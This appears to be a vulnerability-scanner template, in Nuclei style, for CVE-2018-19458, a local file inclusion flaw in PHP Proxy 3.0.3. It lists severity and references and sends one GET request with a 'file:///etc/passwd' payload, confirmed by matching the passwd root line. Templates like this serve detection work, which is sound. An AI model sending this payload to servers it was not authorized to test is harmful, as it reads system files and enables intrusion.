id: CVE-2018-19458 info: name: PHP Proxy 3.0.3 - Local File Inclusion author: daffainfo severity: high description: | PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246). reference: - https://www.exploit-db.com/exploits/45780 - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-19458 - https://www.exploit-db.com/exploits/45780/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-19458 cwe-id: CWE-287 epss-score: 0.15682 cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: php-proxy product: php-proxy tags: edb,cve,cve2018,lfi,proxy http: - method: GET path: - "{{BaseURL}}/index.php?q=file:///etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200